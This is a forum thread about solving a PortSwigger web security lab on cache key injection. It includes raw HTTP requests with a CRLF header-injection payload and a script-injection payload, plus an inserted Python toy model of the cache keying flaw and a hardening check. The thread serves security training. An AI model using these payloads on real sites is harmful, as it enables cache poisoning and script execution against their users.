Burp Suite User Forum


Lab Cache Poisoning - Cache key injection

Samuel | Last updated: Apr 27, 2023 04:17PM UTC

For some reason I cannot solve this lab. First, I'm sending this poison to the localize.js file. I'm receiving the HIT response.

GET /js/localize.js?lang=en?utm_content=z&cors=1&x=1 HTTP/2
Host: 0ad5006c0322e3088120d06e00f100d8.web-security-academy.net
Origin: x%0d%0aContent-Length:%208%0d%0a%0d%0aalert(1)$$$$
Cookie: session=rChKg79rjuzj7UsFPNoqw6DsOdyd8s32; lang=en; lang=en
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers

Next, I'm sending a GET request to /login?lang=en?

GET /login?lang=en?utm_content=x%26cors=1%26x=1$$Origin=x%250d%250aContent-Length:%208%250d%250a%250d%250aalert(1)$$%23 HTTP/2
Host: 0ad5006c0322e3088120d06e00f100d8.web-security-academy.net
Cookie: session=rChKg79rjuzj7UsFPNoqw6DsOdyd8s32; lang=en; lang=en
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers

For the last request I'm receiving a 302 Found with the Location header pointing to the poisoned URL. But the lab doesn't change to solved. Actually, if I visit /login after the poisoning, I can see that there is a redirection to the alert page.
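The kind of discrepancy behind the requests in the post above (the cache leaving utm_content out of its key while the origin acts on parameters hidden inside that value with %26), as an added toy model. This is illustration code, not the lab's or PortSwigger's implementation: the cache and origin parsing rules, the /login redirect behaviour, the cors=1 reflection and the attacker.example origin are all assumptions chosen to make the mismatch visible.

```python
"""Toy model of cache key injection (illustration only, not the lab's code):
the cache and the origin parse the same query differently, so two requests
the cache keys identically produce different origin responses.
Every parsing rule below is an assumption chosen to show the discrepancy."""
from __future__ import annotations
from urllib.parse import unquote

# Assumed cache rule: split the raw query on '&', decode each pair once, and
# leave the tracking parameter utm_content out of the key.
UNKEYED = {"utm_content"}


def split_pairs(query: str) -> list[tuple[str, str]]:
    """Split a query string on '&' into (name, value) pairs, no decoding."""
    pairs = []
    for part in query.split("&"):
        if part:
            name, _, value = part.partition("=")
            pairs.append((name, value))
    return pairs


def cache_key(target: str) -> str:
    """Vulnerable key: decoded per pair, utm_content discarded."""
    path, _, query = target.partition("?")
    kept = [(unquote(n), unquote(v)) for n, v in split_pairs(query)
            if unquote(n) not in UNKEYED]
    return path + ("?" + "&".join(f"{n}={v}" for n, v in kept) if kept else "")


def safe_cache_key(target: str) -> str:
    """Hardened key: the exact bytes the origin will parse, nothing dropped."""
    return target


def origin_params(target: str) -> dict[str, str]:
    """Assumed origin rule: decode the whole query first, then split.
    Decoding before splitting turns an encoded '%26' inside one value into a
    delimiter, so parameters the cache never keyed on appear here."""
    _, _, query = target.partition("?")
    return dict(split_pairs(unquote(query)))


def origin_response(target: str, origin_header: str | None = None) -> dict[str, str]:
    """Hypothetical origin: /login 302s to /login/ echoing the once-decoded
    query into Location, and reflects Origin into ACAO when cors=1."""
    path, _, query = target.partition("?")
    params = origin_params(target)
    headers = {"Location": f"{path}/?{unquote(query)}"}
    if params.get("cors") == "1" and origin_header is not None:
        headers["Access-Control-Allow-Origin"] = origin_header
    return headers


class Cache:
    """Minimal shared cache: one stored response per key, HIT on repeat."""

    def __init__(self, key_fn=cache_key):
        self.key_fn = key_fn
        self.store: dict[str, dict[str, str]] = {}

    def fetch(self, target: str, origin_header: str | None = None):
        key = self.key_fn(target)
        if key in self.store:
            return "HIT", self.store[key]
        resp = origin_response(target, origin_header)
        self.store[key] = resp
        return "MISS", resp


# Constructed requests modelled on the thread: '%26' hides extra parameters
# inside the unkeyed utm_content value, so the vulnerable cache keys the
# attacker's request exactly like the victim's plain /login?lang=en.
VICTIM = "/login?lang=en"
ATTACKER = "/login?lang=en&utm_content=x%26cors=1%26x=1"


def demo(key_fn=cache_key) -> tuple[str, dict[str, str]]:
    """Poison once as the attacker, then fetch as the victim."""
    cache = Cache(key_fn)
    cache.fetch(ATTACKER, origin_header="https://attacker.example")  # hypothetical attacker origin
    return cache.fetch(VICTIM)


if __name__ == "__main__":
    print(cache_key(ATTACKER) == cache_key(VICTIM), origin_params(ATTACKER))
    print(demo())                # HIT: victim receives the poisoned redirect
    print(demo(safe_cache_key))  # MISS: raw-byte key keeps the entries apart
```

Running demo() shows the victim served the attacker's Location and Access-Control-Allow-Origin values from a cache HIT, while demo(safe_cache_key) keeps the two requests in separate entries. The practitioner's check this models: every parameter the origin acts on must be part of the cache key, or the cache must parse the query exactly as the origin does, and any normalisation (decoding, dropping tracking parameters) that happens on one side but not the other is a poisoning candidate.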

Dominyque, PortSwigger Agent | Last updated: May 02, 2023 12:24PM UTC

Hi, we have tested the lab and were able to solve it. Are you still having problems solving it? If so, please let us know. It should be noted that downgrading from HTTP/2 to HTTP/1.1 aided in solving the lab. Here is a link to a video solution, and hopefully this provides some helpful guidance for you: https://www.youtube.com/watch?v=fU65sWuZPyc

Sharon | Last updated: Aug 26, 2023 11:56PM UTC

Following the YouTube video solution did not help. This is what worked:

GET /?utm_content='><script>alert(1)</script> HTTP/2

Dominyque, PortSwigger Agent | Last updated: Aug 28, 2023 09:12AM UTC

Hi Sharon, thank you for sharing that helpful tip!
